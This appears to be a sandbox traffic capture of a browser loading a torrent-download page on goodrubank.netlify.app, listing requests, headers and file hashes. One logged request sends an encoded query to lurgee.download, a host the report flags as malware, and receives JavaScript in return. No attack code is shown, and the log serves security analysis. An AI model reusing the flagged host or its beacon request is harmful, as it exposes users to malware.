                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 1084
Cache-Control: max-age=120282
Date: Tue, 06 Dec 2022 00:00:14 GMT
Etag: "638db4ac-1d7"
Expires: Wed, 07 Dec 2022 09:24:56 GMT
Last-Modified: Mon, 05 Dec 2022 09:06:52 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /ITuJAJXxbv.png HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: image/png
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "e144e44718d71b6a831b95a409fce62c-ssl"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-nf-request-id: 01GKJBQAC7VP1RJBDE365JKD0H
content-length: 5057
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 41 x 44, 8-bit/color RGBA, non-interlaced\012- data
Size:   5057
Md5:    9f48c77050edf6a2c0571885a2eaf58e
Sha1:   33a144a1c432e04444b5111dc57b0138a7b126ba
Sha256: 209011d88ffed3a9a3de5fc90c9a0decd321408d67e763922e020499f734b263
                                        
                                            GET /SnGIPmLkq.png HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: image/png
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "a44149826475d493dcbe771b01e9d76e-ssl"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-nf-request-id: 01GKJBQAC7SRHP5YX94TCJMQMP
content-length: 2802
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 10 x 8, 8-bit/color RGBA, non-interlaced\012- data
Size:   2802
Md5:    20053081d2513cd3215d1215eeb62082
Sha1:   822d9609c9514173334b6ae014af842bf6d60404
Sha256: d36e291f71bea36f31f2fc8912c2bf8a9c8bb260d8b57906f007d1e5bebe3028
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=140432
Date: Tue, 06 Dec 2022 00:00:14 GMT
Etag: "638e079e-116"
Expires: Wed, 07 Dec 2022 15:00:46 GMT
Last-Modified: Mon, 05 Dec 2022 15:00:46 GMT
Server: nginx
Content-Length: 278

                                        
                                            GET /gdiAF.jpg HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: image/jpeg
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "d50e42204149be74d65ec3244e0636b9-ssl"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-nf-request-id: 01GKJBQAC5SQA07BD08M5DJB6H
content-length: 65408
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 990x296, components 3\012- data
Size:   65408
Md5:    324b2da13fcba4b1ec70264a495a616a
Sha1:   d5bd228e20967f7e4489f6aca04f1d3ecfdb4408
Sha256: b28ef86b24ddb010fb5ed287b2a9e89306f1cbf7361e200b2300f25781c9854f
                                        
                                            GET /FDfE.png HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: image/png
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "2e4b427402b0a4e662c965ca4d4ce0b0-ssl"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-nf-request-id: 01GKJBQAC6RSWGRRW8HVB4K0TX
content-length: 9618
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 33 x 133, 8-bit/color RGBA, non-interlaced\012- data
Size:   9618
Md5:    fa5f95d1512cf42529bb30cd3d752ba3
Sha1:   27226ecca9f50c0986f4c3914c6f996dbfabbb2f
Sha256: ee16d2c820d57d1717c341dc1a4a24d343b2192b92c707dc9330a01a6ded60f8
                                        
                                            GET /OszGoBtH.png HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: image/png
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "6a65216a3e642ee064044a833f7816e8-ssl"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-nf-request-id: 01GKJBQAC9HJX52X0T2TWJFSVW
content-length: 169
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 672 x 21, 8-bit/color RGBA, non-interlaced\012- data
Size:   169
Md5:    2d6389404b425246aa1426433f62782c
Sha1:   443233ca88044a3160bf8a436e546b35493ff9bf
Sha256: 6899e53159693416eebd35a07640896dece62ec6f331792b363df692402bb8af
                                        
                                            GET /5HqjCk.css HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/velichne-stolttya-roksolana-123-serya-torrent.html
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: text/css; charset=UTF-8
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
content-encoding: br
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "fe511233b90ac8aa300d851e93b77e8c-ssl-df"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
x-nf-request-id: 01GKJBQA330JY30N2VJ9DR6RJ3
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (19042), with no line terminators
Size:   102667
Md5:    5870a970d114277ce80ec9ae951328aa
Sha1:   6a351ce034472c72fb83cfdf38cc5b6d770f0645
Sha256: a9cabb27ee8dd5975638291f2c3a3b602ee1453375814c617eab05289c20ae9b
                                        
                                            GET /SYlAVV.png HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: image/png
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "658665f0aee79cf3e4a7edd89e9b5d76-ssl"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-nf-request-id: 01GKJBQAC669WY84RKERD7MVG1
content-length: 77011
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 990 x 69, 8-bit/color RGBA, non-interlaced\012- data
Size:   77011
Md5:    df55358d6eb44cd669ffdcd929d245d9
Sha1:   8f32f219c28fd6bc029ec9260fb9a517a427b1d4
Sha256: 76c272ccbbffadd8f98a22a2cfbc4e9692d61fa8b9fb83949cb41dec6e4baeec
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=140431
Date: Tue, 06 Dec 2022 00:00:15 GMT
Etag: "638e079e-116"
Expires: Wed, 07 Dec 2022 15:00:46 GMT
Last-Modified: Mon, 05 Dec 2022 15:00:46 GMT
Server: nginx
Content-Length: 278

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3193
Cache-Control: max-age=129251
Date: Tue, 06 Dec 2022 00:00:15 GMT
Etag: "638dcf79-139"
Expires: Wed, 07 Dec 2022 11:54:26 GMT
Last-Modified: Mon, 05 Dec 2022 11:01:13 GMT
Server: ECS (amb/6BBA)
X-Cache: HIT
Content-Length: 313

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: pUJLB1lkA//jwvHRApEkDg==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

search
                                         52.89.136.7
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: uLvDoACiuaofPMrb0MMFyQn+ZeA=

                                        
                                            GET / HTTP/1.1 
Host: goodrubank.netlify.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Moz: prefetch
Connection: keep-alive
Referer: https://goodrubank.netlify.app/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.159.25.198
HTTP/2 301 Moved Permanently
content-type: text/html; charset=utf-8
                                        
location: https://goodrubank.netlify.app/
server: Netlify
x-nf-request-id: 01GKJBQAWY660R7GJWQM2YR6QC
content-length: 66
date: Tue, 06 Dec 2022 00:00:15 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text
Size:   66
Md5:    bce8880737f3102649b83345d6365b74
Sha1:   f7266323ac8f97ed0785a9fd3754a3bd421edf94
Sha256: 5084f7e41ed955dd905e75ce94580f3cc5ec13818b1480104dd3201f362d09d6
                                        
                                            GET / HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Moz: prefetch
Referer: https://goodrubank.netlify.app/
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
If-None-Match: "1b20bda7762cfc6c14fd60899f81162d-ssl-df"
TE: trailers

search
                                         35.246.229.114
HTTP/2 304 Not Modified
                                        
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:15 GMT
etag: "1b20bda7762cfc6c14fd60899f81162d-ssl-df"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
x-nf-request-id: 01GKJBQAY9T4GRZWEKH7H8WDE0
X-Firefox-Spdy: h2

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15083
Expires: Tue, 06 Dec 2022 04:11:39 GMT
Date: Tue, 06 Dec 2022 00:00:16 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15083
Expires: Tue, 06 Dec 2022 04:11:39 GMT
Date: Tue, 06 Dec 2022 00:00:16 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15083
Expires: Tue, 06 Dec 2022 04:11:39 GMT
Date: Tue, 06 Dec 2022 00:00:16 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15083
Expires: Tue, 06 Dec 2022 04:11:39 GMT
Date: Tue, 06 Dec 2022 00:00:16 GMT
Connection: keep-alive

                                        
                                            GET / HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
age: 2
cache-control: public, max-age=0, must-revalidate
content-encoding: br
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "1b20bda7762cfc6c14fd60899f81162d-ssl-df"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
x-nf-request-id: 01GKJBQAC5WANFZ23R68X2BK41
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (21412), with CRLF line terminators
Size:   11507
Md5:    f9ec618fb7410c7614c43825d6e2f9a4
Sha1:   9d56e02219b87e9923b691d86c3053d2aa38e29e
Sha256: 161d0eabeb3cd08e71ee1036866d5ef1344c272d3174c5a9033f52c2e48ab7ef
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc696fe00-4af0-41c0-a10e-ba5dcc55c22b.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6920
x-amzn-requestid: 05ec2698-a5ee-4046-be77-0036755f2946
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: csSwaEd-IAMF_-Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638e64cf-783b236b79b1e9ba22098cb2;Sampled=0
x-amzn-remapped-date: Mon, 05 Dec 2022 21:38:23 GMT
x-amz-cf-pop: SEA19-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: RF_AmYN7VQghDpDX6kEyBEBZtvR8dfLpwuqk75bGpn8q2OMc46lVgA==
via: 1.1 d0387b833e3ca8cb748a1296b4b4bf2a.cloudfront.net (CloudFront), 1.1 a847181d425b7fc57e81eb3c800bfdf2.cloudfront.net (CloudFront), 1.1 google
date: Mon, 05 Dec 2022 21:48:31 GMT
age: 7905
etag: "b76ea6ae9df756f131ec16b01cdc7ab19b2d01be"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6920
Md5:    f4193f05dfd1de8bf795f433d4387243
Sha1:   b76ea6ae9df756f131ec16b01cdc7ab19b2d01be
Sha256: b56231f3c788519751528b849a442d5c7ed828ea4ce3321fd629ca27440ea6e3
                                        
                                            GET /?aHtjLiGTE=FhUIWE5XWlIJSUNHC1dABEBEUEEdEwYGEFxWRwEIFQNTRlwFHAFWQVUJEFAKEF0FEw0FEFUGR1RRQABSQFoFSkMHCBBYUhEAABwNABdRCRFUUBdRARMAVBABVUdcDhUFV0YABxwHBUEJCxBWAxABUh0QVgUUV1ITUVVBAAAdVFFDAVkQXVIRXAAcUQIXV1wRUgUXV1MTBgYQB1RHAQgVAwJGXAUcAQRPAAsGGRdRCRFXBBdRARMAAxABVUddCBUFV0YBAxwHBUEJXx4XVgUcVQQQVgUUVAcTUVRBWlUdVFBDWwgQXVMRBgQcUQIXV10RUgQXDQMaUQAZVUgwMAsDTUpSCBsLUwVdHQsZAx5HTBlkYB4ZHUIHTkEWQVEEHQMAJw== HTTP/1.1 
Host: lurgee.download
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://goodrubank.netlify.app
Connection: keep-alive
Referer: https://goodrubank.netlify.app/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         188.114.97.1
HTTP/2 200 OK
content-type: text/javascript;charset=UTF-8
                                        
date: Tue, 06 Dec 2022 00:00:15 GMT
access-control-allow-origin: https://goodrubank.netlify.app
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-headers: X-Requested-With
access-control-allow-credentials: true
access-control-max-age: 86400
set-cookie: pbzGKmfmEj=1.1670371214; expires=Wed, 07-Dec-2022 00:00:14 GMT; Max-Age=86400; path=/
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p7TdgRC9pfiSCfKJiE59LU8fwrLOOWPVRGZhSKVGfpvBXqI3fVsp8EY93NjVvR5XpAvIsZoFFX4ZvuzMFVgbjwBjjWBwxT89vf0n1CcDV8UUBFtRY%2BpnUheCxXibwnzRpWM%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7750bd7d6ceab515-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (633)
Size:   6053
Md5:    94cca6f17f2f836afc40a9aa9257e283
Sha1:   90321f098c277ea2321169ccd434a9edff3953f7
Sha256: 567b60594d4039d458ac1258c771d5964c75c3091b7b4f42b36b18ee97272f8c

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc8b8df80-ffce-4960-a0e3-83eaf7ee52f3.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6352
x-amzn-requestid: cd970b83-2a99-4e38-afed-580d733040a4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: csSuWF1bIAMFcpg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638e64c2-1ba552306e857bb37424d679;Sampled=0
x-amzn-remapped-date: Mon, 05 Dec 2022 21:38:10 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: m_QprITRv6aKoKB1VsoqgcIM18ZcHIrJk2gs7710QElOJBtrcskrJw==
via: 1.1 446313511980eb02f28ff5a9a4147c0a.cloudfront.net (CloudFront), 1.1 570075675953459325e00b7bcd171df2.cloudfront.net (CloudFront), 1.1 google
date: Mon, 05 Dec 2022 21:41:55 GMT
etag: "eaa956309d27052d466f7c4bd75b3bdf8443f251"
age: 8301
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6352
Md5:    ebd3528452aecd80e39bbf82d3f71f2c
Sha1:   eaa956309d27052d466f7c4bd75b3bdf8443f251
Sha256: 680066dadbddc2cd7179ad5bdfbf9b2014ea601561e585d18dfcda73512ae84a
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F962c65f4-b402-46b4-83ba-50f3159341f2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11224
x-amzn-requestid: 938de0b8-1055-4416-9ad7-162ab5f4db9f
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: csUINEwdoAMFuOw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638e6701-38b079ef341bb17e567de773;Sampled=0
x-amzn-remapped-date: Mon, 05 Dec 2022 21:47:45 GMT
x-amz-cf-pop: YVR50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: tGtiCE9C3j0BUruNaFN2j1mKxCSouLmocmTXpmLMBJaLNyVwkXu1gQ==
via: 1.1 f0ac467993db44dbfc36b778dfcaf73c.cloudfront.net (CloudFront), 1.1 760139201585481b26f947c5f776103a.cloudfront.net (CloudFront), 1.1 google
date: Mon, 05 Dec 2022 22:09:28 GMT
age: 6648
etag: "36082b7329d473829178f280cb71a83b1531e486"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11224
Md5:    b15136d60fd0a5e0f657a4f5c75d540f
Sha1:   36082b7329d473829178f280cb71a83b1531e486
Sha256: 79478269b1f5dcfd1e45ccd4264fa44805b37c5c8fec820bcbd2fa1689dfbbd8
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa99f7bcf-386e-4655-b6f0-99abdf67f097.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
